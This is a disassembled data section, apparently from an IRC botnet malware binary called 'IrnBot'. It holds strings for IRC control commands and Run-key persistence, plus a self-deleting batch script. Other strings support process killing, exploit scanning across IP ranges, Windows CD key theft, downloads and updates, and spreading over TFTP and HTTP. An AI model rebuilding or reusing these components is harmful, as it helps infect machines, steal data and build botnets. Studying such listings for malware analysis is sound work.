aSS_8		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_418CAF+159o
aSS_9		db '%s-%s',0            ; DATA XREF: sub_418CAF+1D6o
		align 4
aSSSS00S	db '%s %s',0Dh,0Ah      ; DATA XREF: sub_418CAF+24Do
		db '%s %s 0 0 :%s',0Dh,0Ah,0
		align 4
asc_4213E4	db 0Dh,0Ah,0		; DATA XREF: sub_418B81+7Eo
		align 4
aS_11		db '%s',0               ; DATA XREF: sub_418B81+B6o
		align 4
asc_4213EC	db 0Dh,0Ah,0		; DATA XREF: sub_418B81+CBo
		align 10h
aSSS_1		db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417FE1+C2o
		align 4
aS_13		db '%s',0               ; DATA XREF: sub_4184BD+4Ao
		align 10h
asc_421400	db ' :',0               ; DATA XREF: sub_4184BD+7Eo
		align 4
aS_14		db '%s',0               ; DATA XREF: sub_4184BD+8Ao
		align 4
asc_421408:				; DATA XREF: sub_4184BD+E1o
		unicode	0, < >,0
aS_15		db '%s',0               ; DATA XREF: sub_4184BD+FAo
		align 10h
asc_421410:				; DATA XREF: sub_4184BD+124o
		unicode	0, < >,0
aSS_10		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_4184BD+24Ao
aSSS_2		db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_4184BD+31Eo
		align 4
a001		db '001',0              ; DATA XREF: sub_4184BD+33Ao
aSSSSSS		db '%s %s %s',0Dh,0Ah   ; DATA XREF: sub_4184BD+3D3o
		db '%s %s %s',0Dh,0Ah,0
		align 4
a332		db '332',0              ; DATA XREF: sub_4184BD+417o
asc_421448	db ' :',0               ; DATA XREF: sub_4184BD+499o
		align 4
aS_1		db '%s',0               ; DATA XREF: sub_4184BD+4A5o
		align 10h
asc_421450:				; DATA XREF: sub_4184BD+4D9o
		unicode	0, <!>,0
aS_2		db '%s',0               ; DATA XREF: sub_4184BD+4E5o
		align 4
a332_0		db '332',0              ; DATA XREF: sub_4184BD+52Do
aS_3		db '%s',0               ; DATA XREF: sub_4184BD+546o
		align 10h
aS_4		db '%s',0               ; DATA XREF: sub_4184BD+5B1o
		align 4
aS_5		db '%s',0               ; DATA XREF: sub_4184BD+5DFo
		align 4
asc_421468:				; DATA XREF: sub_4184BD+64Eo
		unicode	0, <;>,0
asc_42146C:				; DATA XREF: sub_4184BD:loc_418B12o
		unicode	0, <;>,0
asc_421470:				; DATA XREF: sub_4184BD:loc_418B1Fo
		unicode	0, <;>,0
asc_421474:				; DATA XREF: sub_4182F6+Co
		unicode	0, < >,0
aS_9		db '-s',0               ; DATA XREF: sub_4182F6+27o
		align 4
aS_10		db '/s',0               ; DATA XREF: sub_4182F6+3Fo
		align 10h
asc_421480:				; DATA XREF: sub_4182F6:loc_41834Ao
		unicode	0, < >,0
aQwertyuiopasdf	db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
					; DATA XREF: sub_41810B+21o
		align 4
asc_4214BC:				; DATA XREF: sub_41810B+5Eo
		unicode	0, <[>,0
aSS		db '%s%s|',0            ; DATA XREF: sub_41810B+95o
		align 4
aSS_0		db '%s%s|',0            ; DATA XREF: sub_41810B+C5o
		align 10h
aSp		db '%sP|',0             ; DATA XREF: sub_41810B+F0o
		align 4
aS0I64u		db '%s0%I64u|',0        ; DATA XREF: sub_41810B+12Fo
		align 4
aSI64u		db '%s%I64u|',0         ; DATA XREF: sub_41810B+150o
		align 10h
aSC		db '%s%c',0             ; DATA XREF: sub_41810B+18Fo
		align 4
aS_0		db '%s]',0              ; DATA XREF: sub_41810B+1BAo
aBadAllocati_14	db 'bad allocation',0   ; DATA XREF: .data:00428020o
		align 4
aHs		db 'HS',0               ; DATA XREF: sub_419997+28o
		align 10h
aIrnbot		db 'IrnBot',0           ; DATA XREF: sub_4198C0+89o
		align 4
aSS_1		db '%s\%s',0            ; DATA XREF: sub_41979F+4Eo
		align 10h
aGet		db 'GET',0              ; DATA XREF: sub_4191D2+B7o
aQue?		db 'Que?',0             ; DATA XREF: sub_4191D2+C7o
		align 10h
aHttp1_1501NotI	db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_4191D2+10Fo
		db 'Content-Length: %d',0Dh,0Ah
		db 'Connection: close',0Dh,0Ah
		db 0Dh,0Ah,0
aSSSS		db '%s\%s\%s%s',0       ; DATA XREF: sub_4191D2+229o
		align 4
aSSS		db '%s\%s\%s',0         ; DATA XREF: sub_4191D2+1F2o
		align 10h
aSS_4		db '%s\%s',0            ; DATA XREF: sub_4191D2+25Ao
		align 4
aQue?_0		db 'Que?',0             ; DATA XREF: sub_4191D2+3A8o
		align 10h
aQue?_1		db 'Que?',0             ; DATA XREF: sub_4191D2+2BEo
		align 4
aHttp1_1200OkCo	db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_4191D2+3FCo
		db 'Content-Length: %d',0Dh,0Ah
		db 'Connection: close',0Dh,0Ah
		db 0Dh,0Ah,0
		align 4
aHttpTransferD_	db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
					; DATA XREF: sub_4191D2+51Do
		align 4
aHttpTransfer_0	db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
					; DATA XREF: sub_4191D2+54Ao
		align 4
asc_42164C	db 0Dh,0Ah,0		; DATA XREF: sub_41913F+11o
		align 10h
asc_421650:				; DATA XREF: sub_41913F:loc_41916Bo
		unicode	0, < >,0
asc_421654:				; DATA XREF: sub_41913F+3Do
		unicode	0, < >,0
asc_421658:				; DATA XREF: sub_41913F+54o
		unicode	0, < >,0
asc_42165C	db 0Dh,0Ah		; DATA XREF: sub_41913F+78o
		db 0Dh,0Ah,0
		align 4
asc_421664	db '%x',0               ; DATA XREF: sub_419016+CAo
		align 4
aBadAllocati_15	db 'bad allocation',0
		align 4
aS_16		db '%s',0               ; DATA XREF: sub_41C177+74o
		align 4
aSX		db '%s%X',0             ; DATA XREF: sub_41C177+ECo
		align 4
aBadAllocati_16	db 'bad allocation',0
		align 4
a@echoOff1DelSI	db '@echo off',0Dh,0Ah  ; DATA XREF: sub_419D3D+7Eo
		db ':1',0Dh,0Ah
		db 'del "%s"',0Dh,0Ah
		db 'if exist "%s" goto 1',0Dh,0Ah
		db 'del "%%0"',0Dh,0Ah,0
		align 10h
aSTmpIIICCC_bat	db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_419D3D+FCo
		align 4
aW:					; DATA XREF: sub_419D3D+110o
		unicode	0, <w>,0
aS_7		db '%s',0               ; DATA XREF: sub_419D3D+12Bo
		align 4
aRegistryMonito	db 'Registry Monitor',0 ; DATA XREF: sub_41A0A7+D9o
		align 4
aSoftwareMicr_4	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_41A0A7+12Ao
		align 4
aQuitSYouKill_0	db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
aQuitSYouKilled	db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
					; DATA XREF: sub_41A0A7+15Ao
		align 4
aRemoveAuthenti	db 'Remove: Authentication Failed.',0
		align 4
aD_D_D_D_0	db '%d.%d.%d.%d',0      ; DATA XREF: sub_419C46+4Eo
aVis		db 'VIS',0              ; DATA XREF: sub_419AD1+42o
a2k3		db '2K3',0              ; DATA XREF: sub_419AD1+55o
aXp_0		db 'XP',0               ; DATA XREF: sub_419AD1+62o
		align 4
a2k		db '2K',0               ; DATA XREF: sub_419AD1+6Eo
		align 4
aMe		db 'ME',0               ; DATA XREF: sub_419AD1+81o
		align 4
a98		db '98',0               ; DATA XREF: sub_419AD1+8Eo
		align 10h
aNt		db 'NT',0               ; DATA XREF: sub_419AD1+A0o
		align 4
a95		db '95',0               ; DATA XREF: sub_419AD1+ADo
		align 4
aUnk		db 'UNK',0              ; DATA XREF: sub_419AD1:loc_419B85o
aOsMicrosoftWin	db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
					; DATA XREF: sub_419AD1+108o
		align 4
aS_6		db '%s',0               ; DATA XREF: sub_419AD1+13Ao
		align 10h
a192_168__	db '192.168.*.*',0      ; DATA XREF: sub_419FC7+32o
a10___		db '10.*.*.*',0         ; DATA XREF: sub_419FC7+46o
		align 4
a111___		db '111.*.*.*',0        ; DATA XREF: sub_419FC7+56o
		align 4
a15___		db '15.*.*.*',0         ; DATA XREF: sub_419FC7+66o
		align 10h
a16___		db '16.*.*.*',0         ; DATA XREF: sub_419FC7+76o
		align 4
a172_D__	db '172.%d.*.*',0       ; DATA XREF: sub_419FC7+90o
		align 4
aBadAllocati_17	db 'bad allocation',0
		align 4
aBadAllocati_18	db 'bad allocation',0
		align 4
aMessageboxa_0	db 'MessageBoxA',0      ; DATA XREF: sub_41A2A7+12o
aUser32_dll	db 'user32.dll',0       ; DATA XREF: sub_41A2A7+17o
		align 10h
dword_421880	dd 0D010Fh, 0C3000000h,	0 ; DATA XREF: sub_41A21C+19o
		dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
		dd 69746163h, 6E6Fh
dword_4218AC	dd 63257325h, 0		; DATA XREF: sub_41A301+55o
		dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh
dword_4218C4	dd 6C6E6977h, 6E6F676Fh, 6578652Eh, 0 ;	DATA XREF: sub_41AAD0+3Co
dword_4218D4	dd 68637673h, 2E74736Fh, 657865h ; DATA	XREF: sub_41AAD0+44o
dword_4218E0	dd 76726573h, 73656369h, 6578652Eh, 0 ;	DATA XREF: sub_41AAD0+4Co
aOpenthread	db 'OpenThread',0       ; DATA XREF: sub_41AAD0+5Fo
		align 4
aKernel32_dll_0	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+64o
		align 4
aOpenprocess	db 'OpenProcess',0      ; DATA XREF: sub_41AAD0+78o
aKernel32_dll_1	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+7Do
		align 4
aCreatetoolhelp	db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_41AAD0+8Co
		align 4
aKernel32_dll_2	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+91o
		align 4
aProcess32first	db 'Process32First',0   ; DATA XREF: sub_41AAD0+A0o
		align 4
aKernel32_dll_3	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+A5o
		align 4
aProcess32next	db 'Process32Next',0    ; DATA XREF: sub_41AAD0+B4o
		align 4
aKernel32_dll_4	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+B9o
		align 4
aModule32first	db 'Module32First',0    ; DATA XREF: sub_41AAD0+C8o
		align 4
aKernel32_dll_5	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+CDo
		align 4
aModule32next	db 'Module32Next',0     ; DATA XREF: sub_41AAD0+DCo
		align 4
aKernel32_dll_6	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+E1o
		align 4
aThread32first	db 'Thread32First',0    ; DATA XREF: sub_41AAD0+F0o
		align 4
aKernel32_dll_7	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+F5o
		align 4
aThread32next	db 'Thread32Next',0     ; DATA XREF: sub_41AAD0+104o
		align 4
aKernel32_dll_8	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+109o
		align 4
aReadprocessmem	db 'ReadProcessMemory',0 ; DATA XREF: sub_41AAD0+118o
		align 4
aKernel32_dll_9	db 'kernel32.dll',0     ; DATA XREF: sub_41AAD0+11Do
		align 4
aGetmodulefilen	db 'GetModuleFileNameExA',0 ; DATA XREF: sub_41AAD0+12Co
		align 10h
aPsapi_dll	db 'psapi.dll',0        ; DATA XREF: sub_41AAD0+131o
		align 4
aSS_2		db '%s\%s',0            ; DATA XREF: sub_41AAD0+1F5o
		align 4
aSedebugprivile	db 'SeDebugPrivilege',0 ; DATA XREF: sub_41AAD0+2BEo
		align 4
aSedebugprivi_0	db 'SeDebugPrivilege',0 ; DATA XREF: sub_41AAD0+365o
		align 4
aSystem		db 'System',0           ; DATA XREF: sub_41AAD0+390o
		align 4
aBotKilledS	db 'Bot Killed: %s',0   ; DATA XREF: sub_41AAD0+451o
		align 4
aSoftwareMicr_5	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_41A6CF+36o
		align 4
aSoftwareMicr_6	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
					; DATA XREF: sub_41A6CF+3Do
		align 4
aSoftwareMicr_7	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
					; DATA XREF: sub_41A6CF+44o
aSoftwareMicr_8	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
					; DATA XREF: sub_41A6CF+4Bo
		align 4
aSystemControls	db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
					; DATA XREF: sub_41A89D+26o
		align 4
aSS_5		db '%s\%s',0            ; DATA XREF: sub_41A89D+E4o
		align 4
aLdm		db 'LDM',0              ; DATA XREF: sub_41A89D+118o
aNetdde		db 'NetDDE',0           ; DATA XREF: sub_41A89D+12Bo
		align 4
aEventmessagefi	db 'EventMessageFile',0 ; DATA XREF: sub_41A89D+142o
		align 4
aBadAllocati_19	db 'bad allocation',0
		align 4
aListTTooLong	db 'list<T> too long',0 ; DATA XREF: sub_40121E+2Bo
					; sub_4016BA+2Bo
		align 10h
		dd offset dword_422168
off_421BF4	dd offset nullsub_21	; DATA XREF: sub_41C71F+23o
dword_421BF8	dd 7325h		; DATA XREF: sub_40177B+EBo
					; sub_4019F3+EBo ...
dword_421BFC	dd 652Dh		; DATA XREF: sub_40177B+1D5o
dword_421C00	dd 31h			; DATA XREF: sub_40177B+1E7o
dword_421C04	dd 4C44h		; DATA XREF: sub_40177B+23Fo
					; sub_4019F3+1F1o
aDlAuthFailure_	db 'DL: Auth Failure.',0 ; DATA XREF: sub_40177B:loc_4019C8o
		align 4
aDlInvalidArgum	db 'DL: Invalid Arguments',0 ; DATA XREF: sub_40177B:loc_4019D5o
		align 4
aUpdAuthFailure	db 'UPD: Auth Failure.',0 ; DATA XREF: sub_4019F3:loc_401BF2o
		align 4
aUpdInvalidArgu	db 'UPD: Invalid Arguments.',0 ; DATA XREF: sub_4019F3:loc_401BFFo
		dd offset dword_422318
off_421C64	dd offset sub_40177B	; DATA XREF: .text:0041CFF5o
					; .data:off_437E58o
		dd offset dword_4222CC
off_421C6C	dd offset sub_4019F3	; DATA XREF: .text:0041D011o
					; .data:off_437E54o
dword_421C70	dd 25207325h, 73h	; DATA XREF: sub_401C1D+8Fo
dword_421C78	dd 54495551h, 73253A20h, 0A0Dh ; DATA XREF: sub_401C1D+BFo
aQuitIrnPowered	db 'QUIT :Irn Powered',0Dh,0Ah,0 ; DATA XREF: sub_401C1D:loc_401CF7o
aJoinSS		db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401D0C+1Eo
		align 4
aJoinS		db 'JOIN %s',0Dh,0Ah,0  ; DATA XREF: sub_401D0C+30o
		align 4
aIInsufficientA	db 'I: Insufficient Arguments.',0 ; DATA XREF: sub_401D0C:loc_401D4Ao
					; sub_401D67:loc_401D8Ao
		align 10h
aPartS		db 'PART %s',0Dh,0Ah,0  ; DATA XREF: sub_401D67+14o
		align 4
		dd offset dword_4223FC
off_421CE0	dd offset sub_401C1D	; DATA XREF: .text:0041D02Do
					; .data:off_437E64o
		dd offset dword_4223B0
off_421CE8	dd offset sub_401D0C	; DATA XREF: .text:0041D049o
					; .data:off_437E5Co
		dd offset dword_422364
off_421CF0	dd offset sub_401D67	; DATA XREF: .text:0041D065o
					; .data:off_437E60o
aSystemUptimeI6	db 'System Uptime: %I64u Days, %I64u Hours, %I64u Minutes.',0
					; DATA XREF: sub_401DA7+29o
		align 4
aHttpSDS	db 'http://%s:%d/%s',0  ; DATA XREF: sub_401DED+77o
aWindowsCdKeyS	db 'Windows CD Key: %s',0 ; DATA XREF: sub_401E90+44o
		align 10h
		dd offset dword_4224E0
off_421D54	dd offset sub_401DA7	; DATA XREF: .text:0041D081o
					; .data:off_437E68o
		dd offset dword_422494
off_421D5C	dd offset sub_401DED	; DATA XREF: .text:0041D09Do
					; .data:off_437E6Co
		dd offset dword_422448
off_421D64	dd offset sub_401E90	; DATA XREF: .text:0041D0B9o
					; .data:off_437E70o
off_421D68	dd offset loc_443453	; DATA XREF: sub_401EF9+FAo
					; sub_401EF9+142o ...
aS4AlreadyRunni	db 'S4:Already Running',0 ; DATA XREF: sub_401EF9:loc_402049o
		align 10h
aS4ThreadStoppe	db 'S4: Thread Stopped',0 ; DATA XREF: sub_402086+7Co
		align 4
aS4NoThreadRunn	db 'S4: No Thread Running',0 ; DATA XREF: sub_402086:loc_402109o
		align 4
		dd offset dword_422578
off_421DB0	dd offset sub_401EF9	; DATA XREF: .text:0041D0D5o
					; .data:off_437E78o
		dd offset dword_42252C
off_421DB8	dd offset sub_402086	; DATA XREF: .text:0041D0F1o
					; .data:off_437E74o
		align 10h
aSystemSCpuIXS@	db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
					; DATA XREF: sub_402129+185o
		db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
		db 'm]',0
		align 4
aNetIpSHostNA	db 'Net: IP: %s Host: N/A',0 ; DATA XREF: sub_4022EB+55o
		align 10h
aNetIpSHostS	db 'Net: IP: %s Host: %s',0 ; DATA XREF: sub_4022EB+73o
		align 4
		dd offset dword_422610
off_421E7C	dd offset sub_402129	; DATA XREF: .text:0041D10Do
					; .data:off_437E7Co
		dd offset dword_4225C4
off_421E84	dd offset sub_4022EB	; DATA XREF: .text:0041D129o
					; .data:off_437E80o
dword_421E88	dd 504455h		; DATA XREF: sub_402385+F3o
aUdpInsufficien	db 'UDP: Insufficient Arguments.',0 ; DATA XREF: sub_402385:loc_402486o
		align 4
		dd offset dword_42265C
off_421EB0	dd offset sub_402385	; DATA XREF: .text:0041D145o
					; .data:off_437E84o
aScanUnknownExp	db 'Scan: Unknown Exploit.',0 ; DATA XREF: sub_4024A4:loc_402589o
		align 4
a____0		db '*.*.*.*',0          ; DATA XREF: sub_4024A4+107o
aA		db '-a',0               ; DATA XREF: sub_4024A4+146o
		align 4
aB		db '-b',0               ; DATA XREF: sub_4024A4+155o
		align 4
aC		db '-c',0               ; DATA XREF: sub_4024A4+164o
		align 10h
aScanNotEnoughT	db 'Scan: Not Enough Threads. %d Available.',0 ; DATA XREF: sub_4024A4+1AEo
aD_D_D_D	db '%d.%d.%d.%d',0      ; DATA XREF: sub_4024A4+228o
					; sub_4024A4+365o
aX_		db 'x.',0               ; DATA XREF: sub_4024A4+23Fo
		align 4
aD_		db '%d.',0              ; DATA XREF: sub_4024A4+253o
aSx_		db '%sx.',0             ; DATA XREF: sub_4024A4+26Bo
		align 4
aSD_		db '%s%d.',0            ; DATA XREF: sub_4024A4+266o
		align 4
aSx		db '%sx',0              ; DATA XREF: sub_4024A4+2C8o
aSD		db '%s%d',0             ; DATA XREF: sub_4024A4+2DDo
		align 4
aD_x_x_x	db '%d.x.x.x',0         ; DATA XREF: sub_4024A4+3BEo
		align 4
aD_D_x_x	db '%d.%d.x.x',0        ; DATA XREF: sub_4024A4+3A7o
		align 10h
aD_D_D_x	db '%d.%d.%d.x',0       ; DATA XREF: sub_4024A4+38Do
		align 4
aScanSDUsingDTh	db 'Scan: %s:%d Using %d Threads.',0 ; DATA XREF: sub_4024A4+408o
		align 4
aScanner	db 'Scanner',0          ; DATA XREF: sub_4024A4+4E8o
					; .text:00402A04o
aScanAllScanThr	db 'Scan: All Scan Threads Stopped. %d killed.',0
					; DATA XREF: .text:00402A81o
		align 10h
aStatisticsExpl	db 'Statistics: Exploits:',0 ; DATA XREF: sub_402AA2+3Bo
		align 4
aSSD		db '%s %s: %d',0        ; DATA XREF: sub_402AA2+62o
		align 4
aSDaemons	db '%s; Daemons:',0     ; DATA XREF: sub_402AA2+84o
		align 4
aSTftpD		db '%s TFTP: %d',0      ; DATA XREF: sub_402AA2+9Ao
aSHttpD		db '%s HTTP: %d',0      ; DATA XREF: sub_402AA2+B0o
		dd offset dword_422740
off_422000	dd offset sub_4024A4	; DATA XREF: .text:0041D16Fo
					; .data:off_437E94o
		dd offset dword_4226F4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_469. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd offset dword_4226A8
off_422010	dd offset sub_402AA2	; DATA XREF: .text:0041D1A7o
					; .data:off_437E90o
		align 8
dbl_422018	dq 5.0e-1		; DATA XREF: sub_41B3E7:loc_41B8E6r
flt_422020	dd 4.2949673e9		; DATA XREF: sub_41B3E7+4F9r
		align 8
		dd 48h,	0Eh dup(0)
		dd offset dword_424064
		dd offset dword_422790
		dd 13h
dword_422070	dd 3 dup(0)		; DATA XREF: zcrshv4o:0041E354o
		dd offset off_424008
		dd offset dword_422084
dword_422084	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422080o
		dd 3, 422094h, 4220A4h,	422230h, 42227Ch, 0
		dd offset off_424008
		dd 2, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422084h
dword_4220C0	dd 3 dup(0)		; DATA XREF: zcrshv4o:0041E388o
		dd offset off_4283C0
		dd offset dword_422298
dword_4220D4	dd 3 dup(0)		; DATA XREF: zcrshv4o:0041E3A8o
		dd offset off_424030
		dd offset dword_4220E8
dword_4220E8	dd 2 dup(0)		; DATA XREF: zcrshv4o:004220E4o
		dd 1, 4220F8h, 422100h,	0
		dd offset off_424030
		dd 2 dup(0)
		dd 0FFFFFFFFh, 0
		dd 40h,	4220E8h
dword_42211C	dd 3 dup(0)		; DATA XREF: zcrshv4o:0041EC40o
		dd offset off_424E50
		dd offset dword_422130
dword_422130	dd 2 dup(0)		; DATA XREF: zcrshv4o:0042212Co
		dd 2, 422140h, 42214Ch,	42227Ch, 0
		dd offset off_424E50
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422130h
dword_422168	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421BF0o
		dd offset off_428368
		dd offset dword_42217C
dword_42217C	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422178o
		dd 1, 42218Ch, 422194h,	0
		dd offset off_428368
		align 10h
		dd 0FFFFFFFFh, 0
		dd 40h,	42217Ch
dword_4221B0	dd 3 dup(0)		; DATA XREF: zcrshv4o:0041E348o
		dd offset off_428380
		dd offset dword_4221C4
dword_4221C4	dd 2 dup(0)		; DATA XREF: zcrshv4o:004221C0o
		dd 3, 4221D4h, 4221E4h,	422230h, 42227Ch, 0
		dd offset off_428380
		dd 2, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4221C4h
dword_422200	dd 3 dup(0)		; DATA XREF: zcrshv4o:0041E33Co
		dd offset off_4283A0
		dd offset dword_422214
dword_422214	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422210o
		dd 2, 422224h, 422230h,	42227Ch, 0
		dd offset off_4283A0
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422214h, 3 dup(0)
		dd offset off_4283DC
		dd offset dword_422260
dword_422260	dd 2 dup(0)		; DATA XREF: zcrshv4o:0042225Co
		dd 2, 422270h, 4222B0h,	42227Ch, 0
		dd offset off_4283C0
		dd 2 dup(0)
		dd 0FFFFFFFFh, 0
		dd 40h,	422298h
dword_422298	dd 2 dup(0)		; DATA XREF: zcrshv4o:004220D0o
		dd 1, 4222A8h, 42227Ch,	0
		dd offset off_4283DC
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422260h
dword_4222CC	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421C68o
		dd offset off_4283F8
		dd offset dword_4222E0
dword_4222E0	dd 2 dup(0)		; DATA XREF: zcrshv4o:004222DCo
		dd 2, 4222F0h, 4222FCh,	422194h, 0
		dd offset off_4283F8
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4222E0h
dword_422318	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421C60o
		dd offset off_428410
		dd offset dword_42232C
dword_42232C	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422328o
		dd 2, 42233Ch, 422348h,	422194h, 0
		dd offset off_428410
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	42232Ch
dword_422364	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421CECo
		dd offset off_428424
		dd offset dword_422378
dword_422378	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422374o
		dd 2, 422388h, 422394h,	422194h, 0
		dd offset off_428424
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422378h
dword_4223B0	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421CE4o
		dd offset off_42843C
		dd offset dword_4223C4
dword_4223C4	dd 2 dup(0)		; DATA XREF: zcrshv4o:004223C0o
		dd 2, 4223D4h, 4223E0h,	422194h, 0
		dd offset off_42843C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4223C4h
dword_4223FC	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421CDCo
		dd offset off_428454
		dd offset dword_422410
dword_422410	dd 2 dup(0)		; DATA XREF: zcrshv4o:0042240Co
		dd 2, 422420h, 42242Ch,	422194h, 0
		dd offset off_428454
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422410h
dword_422448	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421D60o
		dd offset off_42846C
		dd offset dword_42245C
dword_42245C	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422458o
		dd 2, 42246Ch, 422478h,	422194h, 0
		dd offset off_42846C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	42245Ch
dword_422494	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421D58o
		dd offset off_428484
		dd offset dword_4224A8
dword_4224A8	dd 2 dup(0)		; DATA XREF: zcrshv4o:004224A4o
		dd 2, 4224B8h, 4224C4h,	422194h, 0
		dd offset off_428484
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4224A8h
dword_4224E0	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421D50o
		dd offset off_4284A0
		dd offset dword_4224F4
dword_4224F4	dd 2 dup(0)		; DATA XREF: zcrshv4o:004224F0o
		dd 2, 422504h, 422510h,	422194h, 0
		dd offset off_4284A0
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4224F4h
dword_42252C	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421DB4o
		dd offset off_4284B8
		dd offset dword_422540
dword_422540	dd 2 dup(0)		; DATA XREF: zcrshv4o:0042253Co
		dd 2, 422550h, 42255Ch,	422194h, 0
		dd offset off_4284B8
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422540h
dword_422578	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421DACo
		dd offset off_4284D0
		dd offset dword_42258C
dword_42258C	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422588o
		dd 2, 42259Ch, 4225A8h,	422194h, 0
		dd offset off_4284D0
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	42258Ch
dword_4225C4	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421E80o
		dd offset off_4284E4
		dd offset dword_4225D8
dword_4225D8	dd 2 dup(0)		; DATA XREF: zcrshv4o:004225D4o
		dd 2, 4225E8h, 4225F4h,	422194h, 0
		dd offset off_4284E4
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4225D8h
dword_422610	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421E78o
		dd offset off_428500
		dd offset dword_422624
dword_422624	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422620o
		dd 2, 422634h, 422640h,	422194h, 0
		dd offset off_428500
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422624h
dword_42265C	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421EACo
		dd offset off_42851C
		dd offset dword_422670
dword_422670	dd 2 dup(0)		; DATA XREF: zcrshv4o:0042266Co
		dd 2, 422680h, 42268Ch,	422194h, 0
		dd offset off_42851C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422670h
dword_4226A8	dd 3 dup(0)		; DATA XREF: zcrshv4o:0042200Co
		dd offset off_428534
		dd offset dword_4226BC
dword_4226BC	dd 2 dup(0)		; DATA XREF: zcrshv4o:004226B8o
		dd 2, 4226CCh, 4226D8h,	422194h, 0
		dd offset off_428534
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4226BCh
dword_4226F4	dd 3 dup(0)		; DATA XREF: zcrshv4o:00422004o
		dd offset off_428550
		dd offset dword_422708
dword_422708	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422704o
		dd 2, 422718h, 422724h,	422194h, 0
		dd offset off_428550
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422708h
dword_422740	dd 3 dup(0)		; DATA XREF: zcrshv4o:00421FFCo
		dd offset off_42856C
		dd offset dword_422754
dword_422754	dd 2 dup(0)		; DATA XREF: zcrshv4o:00422750o
		dd 2, 422764h, 422770h,	422194h, 0
		dd offset off_42856C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422754h, 0
dword_422790	dd 4884h, 4989h, 6C00h,	8C18h, 0F128h, 1CD63h, 1CD7Eh
					; DATA XREF: zcrshv4o:00422068o
		dd 1CD99h, 1CDBCh, 1CDDFh, 1CE04h, 1CE29h, 1CE51h, 1CE87h
